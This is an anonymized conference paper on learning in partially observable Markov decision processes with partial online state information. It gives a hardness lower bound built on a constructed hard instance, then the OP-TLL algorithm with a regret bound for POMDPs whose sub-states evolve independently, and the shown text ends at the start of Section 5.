THEORETICAL HARDNESS AND TRACTABILITY OF POMDPs IN RL WITH PARTIAL ONLINE STATE INFORMATION Anonymous authors Paper under double-blind review ABSTRACT Partially observable Markov decision processes (POMDPs) have been widely applied to capture many real-world applications. However, existing theoretical results have shown that learning in general POMDPs could be intractable, where the main challenge lies in the lack of latent state information. A key fundamental question here is how much online state information (OSI) is sufficient to achieve tractability. In this paper, we establish a lower bound that reveals a surprising hardness result: unless we have full OSI, we need an exponentially scaling sample complexity to obtain an $\epsilon$-optimal policy solution for POMDPs. Nonetheless, inspired by the key insights in our lower bound design, we find that there exist important tractable classes of POMDPs even with only partial OSI. In particular, for two novel classes of POMDPs with partial OSI, we provide new algorithms that are proved to be near-optimal by establishing new regret upper and lower bounds. 1 INTRODUCTION Partially observable Markov decision processes (POMDPs) model reinforcement learning (RL) systems, where an agent interacts with the environment sequentially without observing the latent state. In these systems, the agent only has access to a noisy observation randomly generated by the latent state via an emission probability distribution. The goal of the agent is to achieve a large expected cumulative reward. POMDPs generalize the classic (fully observable) MDPs, and have been applied to capture many real-world applications. For example, an AI-trained robot often receives only noisy observations of the environment from its sensors due to sensory noise [Akkaya et al., 2019]; autonomous cars typically do not have a global view of traffic conditions due to their limited reception [Levinson et al., 2011]. Similar scenarios can occur in games [Berner et al., 2019], healthcare [Hauskrecht & Fraser, 2000], recommendation systems [Li et al., 2010], economic systems [Zheng et al., 2020], and so forth. Existing information-theoretical results have shown that learning in general POMDPs is intractable and PSPACE-complete [Papadimitriou & Tsitsiklis, 1987; Mundhenk et al., 2000; Vlassis et al., 2012; Krishnamurthy et al., 2016]. This is in contrast to classic MDPs, where many efficient algorithms have been developed, e.g., Azar et al. [2017]; Jin et al. [2018]; Agarwal et al. [2019]; Jin et al. [2020]; Ayoub et al. [2020]; Xie et al. [2020]; Foster et al. [2021]; Jin et al. [2022]; Bai et al. [2019]; Cai et al. [2020], among others. The challenge of POMDPs mainly lies in the lack of latent state information, such that the Markov property that simplifies classic MDPs does not hold any more. Despite the intractability in general POMDPs, recent studies have identified some tractable classes of POMDPs, for which efficient algorithms with polynomial dependency (on the number of actions $A$, number of states $S$ and episode length $H$) can be developed, e.g., $m$-step decodable POMDPs [Efroni et al., 2022], reactive POMDPs [Jiang et al., 2017], POMDPs with block MDPs [Zhang et al., 2022] or latent MDPs [Kwon et al., 2021], and POMDPs with reachability [Xiong et al., 2022] or observability [Golowich et al., 2022]. Due to page limits, we relegate more discussions about related work in Appendix A. 
One prominent tractable class is identified based on weakly revealing conditions (Liu et al., 2022; 2023) or predictive state representations (Chen et al., 2022a; Zhong et al., 2022). However, these conditions may not hold in practical cases, e.g., resource allocation (Sinclair et al., 2023; Lee et al., 2023) and robotics (Pinto et al., 2018; Lee et al., 2023). Moreover, the regret obtained there can be arbitrarily large if the emission probability differences between different underlying states are small. To circumvent the dependency and strong assumptions on the emission probability measure, recent work has exploited hindsight state information (Sinclair et al., 2023; Lee et al., 2023), where full state information is revealed only at the end of each episode. This line of work is motivated by the fact that, although precise information about the true underlying state is not available before the agent takes an action, some information may become available in hindsight. However, these studies have assumed full hindsight state information. Thus, a natural question one may ask is: what would happen if the state information was not fully revealed at the end of the episode? In fact, this happens often in practice. For example, in classic wireless channel scheduling formulated by POMDPs (Zhao et al., 2007; Chen et al., 2008; Ouyang et al., 2015), only the feedback about the scheduled or sensed channels will be available to the users; in autonomous driving (Levinson et al., 2011; Pinto et al., 2018; Jennings & Figliozzi, 2019), only the condition of the located or probed path will be known to the car. Further, it can be trivially shown (based on the existing lower bounds in Krishnamurthy et al., 2016; Liu et al., 2022) that such a situation becomes intractable. This thus motivates us to investigate the value of partial (i.e., not full) state information inside (i.e., not at the end of) the episode. We call this partial "Online State Information" (OSI).

In order to model such partial OSI more concretely, we provide a novel formulation. Specifically, we consider vector-structured states (Jin et al., 2020; Agarwal et al., 2019; Ayoub et al., 2020), which are motivated by the aforementioned practical examples. In other words, the state is given by a $d$-dimensional vector, with each element representing an abstract feature, such as the feedback about a wireless channel (Zhao et al., 2007) or the condition of a path in autonomous driving (Jennings & Figliozzi, 2019). Partial OSI means that at each step of an episode, a subset of $\tilde{d}$ ($1 \leq \tilde{d} < d$) elements of the state-vector will be revealed to the agent after her query. Note that such a model allows the agent to actively query partial OSI for different elements at different times. This rules out the trivial case where one state-element can never be observed throughout the process (in which case the problem becomes equivalent to a POMDP with that specific unobservable state-element as the hidden state). Therefore, the key fundamental open questions are:

**With such partial OSI, can POMDPs be tractable/learnable? If not, are there any specific classes of POMDPs that can be tractable under partial OSI?**

**Our Contributions:** In this paper, we study the important problem of POMDPs with partial OSI and provide in-depth answers to the above key open questions.
First, we establish a lower bound in Theorem 1 that reveals a surprising hardness result: unless we have full OSI, we need an exponentially scaling sample complexity of $\Omega(A^H/\epsilon^2)$ to find an $\epsilon$-optimal policy for POMDPs, where $A$ and $H$ are the number of actions and the episode length, respectively. This result indicates a sharp gap between POMDPs with partial OSI and those with full OSI or full hindsight state information (Lee et al., 2023). This may seem somewhat counter-intuitive, because by combining multiple partial OSI from different steps, one may construct the full information of a state, and thus enjoy similar performance to that with full OSI. In fact, in Sec. 3, we design a hard instance with special state representations and transitions, under which partial OSI at each step, and even a combination of partial OSI from different steps, is not sufficient to achieve an $\epsilon$-optimal solution with polynomial complexity. Nonetheless, inspired by the key insights in our design of the hard instance for establishing the lower bound, we identify two intriguing tractable classes of POMDPs with only partial OSI.

Second, inspired by our state-transition design for the lower bound, in Sec. 4 we identify a novel tractable class of POMDPs with partial OSI, where the transitions of the sub-states (i.e., elements) in the state-vector are independent of each other. This class is motivated by many practical examples, ranging from wireless scheduling (Zhao et al., 2007; Chen et al., 2008; Ouyang et al., 2015) to Martian rock-sampling (Silver & Veness, 2010) and autonomous driving (Pinto et al., 2018; Jennings & Figliozzi, 2019). We provide two new near-optimal algorithms for this class. The regrets of both algorithms achieve a polynomial dependency on all parameters (please see Theorem 2 and Theorem 6). In addition, the regret of our second algorithm, for the case with $\tilde{d} > 1$, shows that the regret can be further reduced as $\tilde{d}$ increases. To achieve such results, our algorithm design includes important novel ideas to determine (i) which partial OSI is more informative, and (ii) the action policy that relies on the queried partial OSI at each step. These also require new technical developments in the regret analysis (see Appendix E and Appendix F).

Third, inspired by our state-representation design for the lower bound, in Sec. 5 we identify another novel tractable class of POMDPs with partial OSI, where additional noisy observations are available for the sub-states in the state-vector that are not actively queried. We provide a new algorithm with a near-optimal regret in Theorem 3. Our regret analysis involves a non-trivial generalization of the observable operator method (Jaeger, 2000; Liu et al., 2022) to handle the case with partial OSI of different sub-states that are actively queried by the agent. In addition, we provide a new regret lower bound in Theorem 4 that demonstrates the near-optimality of the regret that we achieve.

2 PROBLEM FORMULATION

In this section, we first introduce the general episodic partially observable Markov decision process (POMDP) for clarity, which is intractable in the worst case. Then, we introduce the POMDP setting with partial online state information (OSI) that we study in this paper.
2.1 THE GENERAL EPISODIC POMDP

Episodic POMDPs are usually modelled by a tuple $M = (\mathcal{S}, \mathcal{A}, \mathcal{O}, H, \Delta_1, P, \Omega, r)$ (Liu et al., 2022; Chen et al., 2022a;b; Cai et al., 2022), where $\mathcal{S}$, $\mathcal{A}$ and $\mathcal{O}$ denote the state space with $S$ states, the action space with $A$ actions and the observation space with $O$ observations, respectively; $H$ denotes the number of steps in an episode; $\Delta_1 : \mathcal{S} \rightarrow [0, 1]$ denotes a probability measure supported on the state space $\mathcal{S}$, which determines the randomness of the initial state at the beginning of an episode; $P = \{P_h : \mathcal{S} \times \mathcal{S} \times \mathcal{A} \rightarrow [0, 1]\}_{h=1}^{H-1}$ and $\Omega = \{\Omega_h : \mathcal{O} \times \mathcal{S} \rightarrow [0, 1]\}_{h=1}^{H}$ denote the unknown transition and emission probability measures, respectively; and $r = \{r_h : \mathcal{O} \times \mathcal{A} \rightarrow [0, 1]\}_{h=1}^{H}$ denotes the known reward function. Specifically, an online agent interacts with the environment in $K$ episodes. At each step $h = 1, \ldots, H$ of an episode, the agent receives a noisy observation $o_h^k$ that is generated according to the emission probability $\Omega_h(\cdot | s_h^k)$, where $s_h^k$ is the unknown true latent state. Next, the agent takes an action $a_h^k$ and receives the reward $r_h(o_h^k, a_h^k)$. Then, the environment transitions to the next state $s_{h+1}^k$, which is drawn according to the transition probability $P_h(\cdot | s_h^k, a_h^k)$. The goal of the agent is to find a near-optimal policy that achieves an expected cumulative reward close to that of the optimal policy. Please see Fig. 1a for a sketch of one step. Due to the lack of latent state information, the observation is non-Markovian and the policy needs to maintain memory.

2.2 THE EPISODIC POMDP WITH PARTIAL OSI

As discussed in Sec. 1, in this paper we make the first effort to investigate the impact of partial OSI on POMDPs, and we provide a formulation for studying POMDPs with partial OSI. Specifically, we consider vector-structured states (Jin et al., 2020; Ayoub et al., 2020; Agarwal et al., 2019). Each state $s$ is represented by a $d$-dimensional feature vector $\phi(s) = [\phi_1(s), ..., \phi_d(s)]^T \in \mathbb{S}^d$, where $\mathbb{S}$ is the universal set of values for each element/sub-state of $\phi(s)$, and $[\cdot]^T$ denotes the transpose of a vector. We use $|\mathbb{S}|$ to denote the cardinality of the set $\mathbb{S}$. Then, at each step $h = 1, \ldots, H$ of an episode $k = 1, \ldots, K$, the agent interacts with the environment as follows (please see Fig. 1b for a sketch of one step of the POMDP with partial OSI): (Step-i) The agent actively queries a subset of $\tilde{d}$ (where $1 \leq \tilde{d} < d$) sub-states (we let $\hat{i}_h^k$ denote the indices of these queried sub-states); (Step-ii) the partial OSI, i.e., the precise information of the queried sub-states $\{\phi_i(s_h^k)\}_{i \in \hat{i}_h^k}$, is revealed to the agent; (Step-iii) the agent takes an action $a^k_h$ and receives the reward $r_h(\phi_{\hat{i}_h^k}(s^k_h), a^k_h)$, where the reward $r_h : \hat{\mathcal{S}} \times \mathcal{A} \rightarrow [0, 1]$ is a function of the partial OSI and $\hat{\mathcal{S}} \triangleq \{\phi_{\hat{i}}(s) : |\hat{i}| = \tilde{d}, s \in \mathcal{S}\}$ is the sub-state space for any union of $\tilde{d}$ sub-states; (Step-iv) the environment transitions to the next state $s^k_{h+1}$.
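To make the interaction protocol concrete, below is a minimal Python sketch of one episode under partial OSI; `env`, `query_policy`, and `action_policy` are assumed interfaces of ours, not part of the paper.

```python
# Hypothetical sketch of one episode under the partial-OSI protocol (Steps i-iv).
def run_episode(env, query_policy, action_policy, H, d_tilde):
    feedback = []                                 # history of (query, OSI, action)
    total_reward = 0.0
    for h in range(H):
        i_h = query_policy(h, feedback, d_tilde)  # Step-i: pick d_tilde indices
        partial_osi = env.reveal(i_h)             # Step-ii: exact queried sub-states
        a_h = action_policy(h, feedback, partial_osi)  # Step-iii: act on partial OSI
        r_h = env.step(a_h)                       # reward; Step-iv: state transition
        total_reward += r_h
        feedback.append((i_h, partial_osi, a_h))
    return total_reward
```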
This model is motivated by various practical scenarios, e.g., wireless scheduling (Chen et al., 2008; Ouyang et al., 2015), autonomous driving (Levinson et al., 2011; Pinto et al., 2018; Jennings & Figliozzi, 2019), robotics (Akkaya et al., 2019; Lee et al., 2023; Silver & Veness, 2010) and healthcare (Hauskrecht & Fraser, 2000). Below, we elaborate on two important motivating examples.

**Motivating example 1:** In an autonomous delivery system (Jennings & Figliozzi, 2019), in order to deliver a product to its destination, a robot explores multiple paths and chooses one path at each intersection. Here, each sub-state $\phi_i(s)$ of $s$ represents the condition, e.g., traffic intensity, of one path. At each step, the robot agent first actively queries and observes the conditions of several paths, i.e., the partial OSI. However, due to delay requirements, unknown dynamics in the environment, and occlusion, the precise conditions of the other paths may not be available to the robot. Then, she chooses one path to follow, i.e., the action that will incur a reward.

**Motivating example 2:** Consider a cognitive MAC (medium access control) system (Ouyang et al., 2015), where a secondary user, i.e., an agent, wishes to search for spectrum-access opportunities. Here, the state $s$ characterizes the conditions of multiple channels available for the agent to use. Sub-state $\phi_i(s)$ represents the condition, e.g., busy or idle, of the $i$-th channel. At each step, the agent first probes the conditions of a number of channels. After this query, the conditions of the sensed channels will be observed, i.e., the partial OSI. However, due to energy constraints and latency requirements, the agent cannot sense all the channels. Then, she transfers the packets using one channel, i.e., the action that will incur a reward.

2.3 PERFORMANCE METRIC

In POMDPs with partial OSI, at each step $h$ of episode $k$, the feedback revealed to the agent is $\Phi^k_h = (\phi_{\hat{i}^k_1}(s^k_1), a^k_1, ..., \phi_{\hat{i}^k_{h-1}}(s^k_{h-1}), a^k_{h-1})$. We use $\tilde{\Phi}_h$ to denote the feedback space of $\Phi^k_h$ before the partial OSI for step $h$ is revealed, and use $\bar{\Phi}_h = \{\tilde{\Phi}_h \cup \{\phi_{\hat{i}}(s_h)\}_{\hat{i}}\}$ to denote the feedback space after the partial OSI for step $h$ has been revealed. Then, the query $\hat{i}_h^k$ is made according to a **query policy** $\pi^k_{q,h} : \tilde{\Phi}_h \rightarrow \Delta_h(\{\hat{i} : |\hat{i}| = \tilde{d}\})$, which maps from $\tilde{\Phi}_h$ to a probability measure $\Delta_h(\{\hat{i} : |\hat{i}| = \tilde{d}\})$ supported on the query space $\{\hat{i} : |\hat{i}| = \tilde{d}\}$. Next, after receiving the partial OSI $\phi_{\hat{i}^k_h}(s^k_h)$, the action $a^k_h$ is taken according to an **action policy** $\pi^k_{a,h} : \bar{\Phi}_h \rightarrow \Delta_h(\mathcal{A})$, which maps from $\bar{\Phi}_h$ to a probability measure $\Delta_h(\mathcal{A})$ supported on the action space $\mathcal{A}$. We use the $V$-value $V^{\pi^k} \triangleq \mathbb{E}_{\pi^k_q, \pi^k_a, \Delta_1, P}\left[\sum_{h=1}^{H} r_h(\phi_{\hat{i}^k_h}(s^k_h), a^k_h)\right]$ to denote the expected total reward in episode $k$ obtained by following $\pi^k_q = \{\pi^k_{q,h}\}_{h=1}^{H}$ and $\pi^k_a = \{\pi^k_{a,h}\}_{h=1}^{H}$, where $\pi^k = (\pi^k_q, \pi^k_a)$.
We take the regret as the performance metric, which is the difference between the expected cumulative reward of the online joint policies $\pi^{1:K}$ and that of the optimal policy, i.e.,

$$\text{Reg}^{\pi^{1:K}}(K) \triangleq \sum_{k=1}^{K} \left[ V^* - V^{\pi^k} \right], \quad (1)$$

where $V^* \triangleq \sup_{\pi} V^{\pi}$ denotes the expected total reward of the optimal policy in an episode. The goal of the online agent is to find a policy that achieves a sub-linear regret with respect to $K$. Hence, the main challenge and new difficulty here is how to design the query policy $\pi^k_q$, such that an action policy $\pi^k_a$ can also be intelligently developed to achieve a near-optimal regret.

3 PERILS OF NOT HAVING FULL OSI: A NEW LOWER BOUND

In this section, we answer the long-standing open question: are POMDPs with online state information tractable without full OSI? In Theorem 1 below, we establish a lower bound that reveals a surprising hardness result: unless we have full OSI, we need an exponential sample complexity to find an $\epsilon$-optimal policy for POMDPs, where a policy $\pi$ is $\epsilon$-optimal if $V^{\pi} \geq V^* - \epsilon$.

---

1 Recall that $\phi_{\hat{i}^k_h}(s^k_h) \in \bar{\Phi}_h$. Thus, the action policy $\pi^k_{a,h}$ relies on the output of the query policy $\pi^k_{q,h}$.

Figure 2: A hard instance for developing the lower bound in POMDPs with only partial OSI. States $s(1), s(2), s(3)$ and $s(4)$ are represented by solid circles, dashed circles, solid squares and dashed squares, respectively. Ber(1/2) represents the Bernoulli distribution with mean 1/2.

**Theorem 1. (Intractability of not having full OSI)** For POMDPs with only partial online state information, as introduced in Sec. 2.2, there exist hard instances such that, with probability $p \geq 1/3$, any algorithm needs at least $\Omega(A^H/\epsilon^2)$ samples to find an $\epsilon$-optimal policy.

Theorem 1 demonstrates the hardness of POMDPs without full OSI: a polynomially scaling sample complexity $\text{Poly}(A,H,S,K)$ is impossible. The result in Theorem 1 may seem counter-intuitive, because by combining multiple partial OSI collected from different steps, one may construct full observations and then enjoy similar performance to that with full OSI. Below, we design an important hard instance and present our key proof ideas for Theorem 1, which show why this is not true.

**Remark 1.** The intractability result in Theorem 1 still holds even if, in addition to partial OSI, there exist noisy observations (please see our discussion in Sec. 5). This is because we can construct a hard instance directly based on the one that we construct in this section, while letting the emission probabilities of the additional noisy observations be exactly the same for all underlying states, such that the additional observations do not provide any useful statistical information.

3.1 OUR KEY PROOF IDEAS FOR THEOREM 1

For simplicity, we focus on the simpler case with $d = 2$ and $\tilde{d} = 1$, which makes it easier to understand our key proof ideas. Please see Appendix C for the complete proof. The crucial parts of our proof are the design of special state representations and transitions, such that partial OSI cannot help the learner improve her statistical knowledge about the true underlying state. Towards this end, we construct a hard instance with four states, i.e., $s(1), s(2), s(3)$ and $s(4)$ (see Fig. 2).
**Idea I (Special state representations):** Our first key idea is to construct special state representations such that, by observing only $\tilde{d} = 1$ sub-state, it is still impossible for the learner to infer the true latent state. Specifically, we let $\phi(s(1)) = [x_1, x_2]^T$, $\phi(s(2)) = [x_3, x_4]^T$, $\phi(s(3)) = [x_1, x_4]^T$ and $\phi(s(4)) = [x_3, x_2]^T$, where $x_1, ..., x_4$ are sub-states (see Fig. 2). The high-level reason for constructing the state representations in this way is as follows. Let us consider states $s(1)$ and $s(2)$ as one group of states, which we call group $a$. Similarly, we call states $s(3)$ and $s(4)$ group $b$. Under our construction of the state representation, each state in group $a$ (i.e., $s(1)$ and $s(2)$) must share a sub-state with each state of group $b$ (i.e., $s(3)$ and $s(4)$). For example, the first sub-states of both state $s(1)$ and state $s(3)$ are $x_1$. This means that, by only querying $\phi_1(s) = x_1$, the learner cannot know whether she is in a state from group $a$ or group $b$. As another example, the second sub-states of both state $s(1)$ and state $s(4)$ are $x_2$. This means that, by only querying $\phi_2(s) = x_2$, the learner cannot know whether she is in a state from group $a$ or group $b$. As a result, if (i) there is only one specific action sequence that guarantees that the learner stays in group $a$, and (ii) group $a$ generates a larger reward, then intuitively the learner has to keep trying an exponential number of possible action sequences to figure this out with high probability.

However, as we mentioned before, another question remains: would a combination of the partial OSI from different steps be enough? To answer this question, we construct special state transitions using our Idea II below. Together with the state representation constructed above, this state transition causes difficulty for the learner even when multiple partial OSI are combined.

**Idea II (Special state transitions):** Our second key idea is to construct special state transitions such that, even by combining the partial OSI from different steps, it is still impossible for the learner to infer the true latent state. Specifically, in each episode, the learner starts from state $s_1 = s(1)$ (see Fig. 2). At step $h = 1$, (i) if action $a(1)$ is chosen, the state will transition to $s(1)$ and $s(2)$ with the same probability (wsp); (ii) if action $a(2)$ is chosen, the state will transition to $s(3)$ and $s(4)$ wsp. At step $h = 2$, (i) if action $a(1)$ is chosen, both states $s(1)$ and $s(2)$ will transition to $s(3)$ and $s(4)$ wsp; (ii) if action $a(2)$ is chosen, they will transition to $s(1)$ and $s(2)$ wsp. At step $h = 3$, (i) if action $a(1)$ is chosen, states $s(1)$ and $s(2)$ will transition to $s(1)$ and $s(2)$ wsp; (ii) if action $a(2)$ is chosen, they will transition to $s(3)$ and $s(4)$ wsp. For states $s(3)$ and $s(4)$ at steps $h = 2$ and $h = 3$, no matter which action is chosen, the states will transition to $s(3)$ and $s(4)$ wsp.
Then, together with the state representation that we constructed, even when the partial OSI about the first and second sub-states from different steps is combined, such a construction of the state transitions still prevents the learner from knowing which group of states she is in. For example, at step $h = 1$ of two consecutive episodes, the learner can keep taking action $a(1)$ and query the first and second sub-states one by one. Then, the partial OSI at step $h = 2$ could be $\phi_1(s^k_2) = x_1$ (i.e., the first sub-state of $s(1)$) and $\phi_2(s^{k+1}_2) = x_4$ (i.e., the second sub-state of $s(2)$). However, note that the first and second sub-states of $s(3)$ are also $x_1$ and $x_4$. Thus, such a combination of partial OSI (i.e., $\phi_1(s^k_2) = x_1$ and $\phi_2(s^{k+1}_2) = x_4$) is not powerful enough for the learner to distinguish whether she is visiting $s(1)$ and $s(2)$, or simply visiting $s(3)$. Similar issues occur at other steps.

**Idea III (Special reward functions):** Up to here, we can see that with only partial OSI, the learner cannot improve her statistical knowledge about the true underlying states. Thus, she can only rely on the statistical relation between the sequence of actions that is chosen and the reward that is received. Hence, to create difficulties, we let (i) the rewards $r_h$ at steps $h = 1, 2, 3$ all be 0; (ii) if the final state is in group $b$, i.e., $s(3)$ or $s(4)$, the reward at step $h = 4$ follow a Bernoulli distribution with mean $\frac{1}{2}$; (iii) if the final state is in group $a$, i.e., $s(1)$ or $s(2)$, the reward at step $h = 4$ follow a Bernoulli distribution with a slightly higher mean equal to $\frac{1}{2} + \epsilon$. In this way, the optimal policy will take the action sequence $(a(1), a(2), a(1))$ in all episodes, so that it remains in group $a$ and enjoys a larger expected total reward of $\frac{1}{2} + \epsilon$ in every episode. In contrast, the online learner has to try every possible sequence of actions to figure out, with high probability, which sequence provides a larger reward. Since there are $A^H$ possible action sequences, by Hoeffding's inequality, we can show that the sample complexity for achieving an $\epsilon$-optimal policy is $\Omega(A^H/\epsilon^2)$.

4 OPTIMALITY UNDER PARTIAL OSI AND INDEPENDENT SUB-STATES

While learning in the world of general POMDPs with partial OSI is intractable, inspired by the key insights in our lower-bound design, we identify two rich classes of POMDPs with partial OSI that are tractable, for which we provide new near-optimal algorithms. We leave other potential learnable classes as future work. The tractable class that we study in this section is as follows.

**Class 1. (POMDPs with partial OSI and independent sub-states)** At each step, (step-i) the agent actively selects sub-states $\hat{i}^k_h$ to query, and receives the partial OSI $\{\phi_i(s^k_h)\}_{i \in \hat{i}^k_h}$; (step-ii) the agent takes the action $a^k_h$ and receives the reward $r_h(\phi_{\hat{i}^k_h}(s^k_h), a^k_h)$; (step-iii) the next state $s^k_{h+1}$ is drawn according to the probability $P_h(\cdot|s^k_h, a^k_h) = \prod_{i=1}^d P_{h,i}(\phi_i(\cdot)|\phi_i(s^k_h), a^k_h)$, where the product form indicates that the sub-states have independent transition kernels.

This class is motivated by many important practical applications.
For example, in classic wireless channel scheduling (Zhao et al., 2007; Chen et al., 2008; Ouyang et al., 2015), the condition of each channel could change independently; and in Martian RockSampling (Silver & Veness, 2010) or autonomous driving (Pinto et al., 2018; Jennings & Figliozzi, 2019), the condition of each potential rock or path could also change independently. Notably, as we state in Proposition 1, without the partial OSI in step-i of Class 1, even learning under independent sub-states could still be intractable.

**Proposition 1. (Intractability of not having partial OSI)** There exist POMDPs with independent sub-states, such that learning an $\epsilon$-optimal policy necessarily requires $\tilde{\Omega}(A^H/\epsilon^2)$ samples.

**Remark 2.** By replacing partial OSI with noisy observations under certain conditions, POMDPs with independent sub-states could be decoupled into parallel sub-POMDPs, which may be solved using existing methods. In contrast, the query of the agent for partial OSI in Class 1 couples the potential sub-POMDPs together, such that existing solutions do not apply or result in poor performance.

**Algorithm 1** Optimistic-Pessimistic Two-Layer Learning (OP-TLL)

**for** $k = 1 : K$ **do**
&nbsp;&nbsp;**Step-1:** update the weights $w^k(i)$ and probabilities $p^k(i)$ according to Eq. (2).
&nbsp;&nbsp;**for** $h = 1 : H$ **do**
&nbsp;&nbsp;&nbsp;&nbsp;**Step-2:** choose a sub-state $\hat{i}_h^k$ according to the probability $p^k(i)$ and query the partial OSI $\phi_{\hat{i}_h^k}(s_h^k)$.
&nbsp;&nbsp;&nbsp;&nbsp;**Step-3:** take an action $a_h^k$ that maximizes the updated $Q$-value function in Eq. (3).
&nbsp;&nbsp;**end for**
**end for**

For Class 1, we develop two new near-optimal algorithms. Due to page limits, we focus on the simpler case with $\tilde{d} = 1$ in this section, and introduce our results for the more challenging case with $\tilde{d} > 1$ in Appendix F. Our new algorithm for $\tilde{d} = 1$ is called Optimistic-Pessimistic Two-Layer Learning (OP-TLL); please see Algorithm 1. At each step $h$, the optimal policy queries a sub-state $i$ according to a fixed distribution $p$, receives the partial OSI for this queried sub-state, and then takes an action according to $\phi_i(s_h)$. We note that the new challenge here is: how to utilize partial OSI to avoid the intractability issue shown in Proposition 1 and achieve optimality? To address this question, our OP-TLL algorithm contains two critical learning layers that involve our two new ideas, and obtains a near-optimal regret.

**Idea-I (Update the query policy pessimistically):** This pessimism is needed because the query policy updated in “Step-1” of Algorithm 1 affects the choice of the action $a_h^k$ in Step-3, which requires complete state information for the $V$-value estimation. As a result, the relation between the regret and the model misspecification error (Jin et al., 2020) indicates a linear-in-$K$ regret if the estimation error due to the query is not sufficiently taken into account. Thus, although the state transitions and rewards are stochastic, the query needs to be made sufficiently conservatively. Specifically, at the beginning of each episode $k$, OP-TLL updates the query policy as follows,

$$w^k(i) = w^{k-1}(i) \cdot e^{\frac{\eta_1}{d} \sum_{h=1}^{H} \hat{r}_h^{k-1}(\phi_i(s_h^{k-1}), a_h^{k-1})}, \quad \text{and} \quad p^k(i) = \frac{(1-\eta_1)w^k(i)}{\sum_{i'=1}^{d} w^k(i')} + \frac{\eta_1}{d}, \quad (2)$$

where the estimated reward is $\hat{r}_h^{k-1}(\phi_i(s_h^{k-1}), a_h^{k-1}) = r_h(\phi_i(s_h^{k-1}), a_h^{k-1})$ if $i = \hat{i}_h^{k-1}$, and $\hat{r}_h^{k-1}(\phi_i(s_h^{k-1}), a_h^{k-1}) = 0$ otherwise.
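Below is a minimal NumPy sketch of this exponential-weights update (Eq. (2)); variable names are ours, and `r_hat_episode[i]` holds $\sum_{h=1}^H \hat{r}_h^{k-1}$ for sub-state $i$ (zero for sub-states that were not queried).

```python
import numpy as np

def update_query_policy(w, r_hat_episode, eta1):
    # Eq. (2): multiplicative-weights update followed by eta1/d exploration mixing.
    d = len(w)
    w = w * np.exp((eta1 / d) * r_hat_episode)   # pessimistic weight update
    p = (1.0 - eta1) * w / w.sum() + eta1 / d    # query distribution p^k
    return w, p
```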
Note that this is a new variant of the importance-sampling method, where the new development lies in estimating the reward by exploiting partial OSI. Moreover, $\eta_1$ is a key parameter that determines how pessimistic the algorithm is. For example, with a smaller $\eta_1$, the term $e^{\frac{\eta_1}{d} \sum_{h=1}^{H} \hat{r}_h^{k-1}(\phi_i(s_h^{k-1}), a_h^{k-1})}$ increases more slowly. As a result, the weight $w^k(i)$ increases more slowly, and thus the algorithm behaves more pessimistically. In “Step-2”, OP-TLL chooses the query according to the probability $p^k(i)$, whose first term, proportional to $\frac{w^k(i)}{\sum_{i'=1}^{d} w^k(i')}$, captures the query importance of sub-state $i$ among all sub-states.

**Idea-II (Update the action policy optimistically):** The intuition for this optimism is to minimize the bias in the reward estimates, which is critical because the query policy updated in Step-1 relies on the estimated reward. Specifically, in “Step-3”, OP-TLL takes an action that maximizes the $Q$-value function following the optimism-in-the-face-of-uncertainty principle (the new challenge here is how to design the bonus term to address the impact of partial OSI),

$$Q_h^k(\phi_i(s), a) = \min\left\{r_h(\phi_i(s), a) + [\hat{P}_h^k V_{h+1}^k](\phi_i(s), a) + O\left(\sqrt{H^2/N_h^k(\phi_i(s), a)}\right),\ H\right\}, \quad (3)$$

where $\hat{P}_h^k(\phi_i(s')|\phi_i(s), a) = \frac{N_h^k(\phi_i(s), a, \phi_i(s'))}{N_h^k(\phi_i(s), a)}$ is the estimated transition kernel, $N_h^k(\phi_i(s), a)$ and $N_h^k(\phi_i(s), a, \phi_i(s'))$ are the numbers of times $(\phi_i(s), a)$ and $(\phi_i(s), a, \phi_i(s'))$ have been visited at step $h$ up to episode $k$, respectively, and $V_h^k(\phi_i(s)) = \max_a Q_h^k(\phi_i(s), a)$ is the estimated $V$-value.

**Theorem 2. (Regret)** For POMDPs with partial OSI ($\tilde{d} = 1$) and independent sub-states, with probability $1 - \delta$ for any $\delta \in (0, 1)$, the regret of our OP-TLL algorithm with parameter $\eta_1 = O\left(\sqrt{\frac{d \ln d}{H^2 K}}\right)$ can be upper-bounded as follows,

$$\text{Reg}_{\text{OP-TLL}}(K) \leq \tilde{O}\left(AH^3|\mathbb{S}|^2 d\sqrt{K}\left(\ln(AH^2|\mathbb{S}|K/\delta)\right)^2\right). \quad (4)$$

Theorem 2 shows that OP-TLL achieves a regret that (i) depends polynomially on all parameters $A$, $H$, $|\mathbb{S}|$, $d$ and $K$, and (ii) depends on $\sqrt{K}$, which is tight. To the best of our knowledge, this is the first such near-optimal result for POMDPs with partial OSI. Similar to the algorithm design, the main difficulty in the proof is how to capture the mutual impact between the query and action policies. Due to page limits, please see Appendix E for details and Appendix F for the case when $\tilde{d} > 1$.
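Returning to Step-3 of OP-TLL, below is a minimal sketch of the optimistic $Q$-update in Eq. (3); the data structures and the bonus constant `c` are ours, standing in for the unspecified constant in the $O(\cdot)$ bonus.

```python
import numpy as np

def optimistic_q(r, P_hat, V_next, N, H, c=1.0):
    # Eq. (3): Q = min{ r + P_hat . V_next + bonus, H }, where the bonus
    # c * sqrt(H^2 / N) shrinks with the visitation count N of (phi_i(s), a).
    # P_hat: empirical next-sub-state distribution; V_next: estimated V-values
    # at step h+1 for each possible next sub-state.
    bonus = c * np.sqrt(H ** 2 / max(N, 1))
    return min(r + P_hat @ V_next + bonus, H)
```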
5 OPTIMALITY UNDER PARTIAL OSI AND PARTIAL NOISY OBSERVATIONS

In this section, we identify another tractable class (i.e., Class 2 below) of POMDPs with partial OSI, and provide a new near-optimal algorithm. Please see Fig. 1c for a sketch of one step in this class.

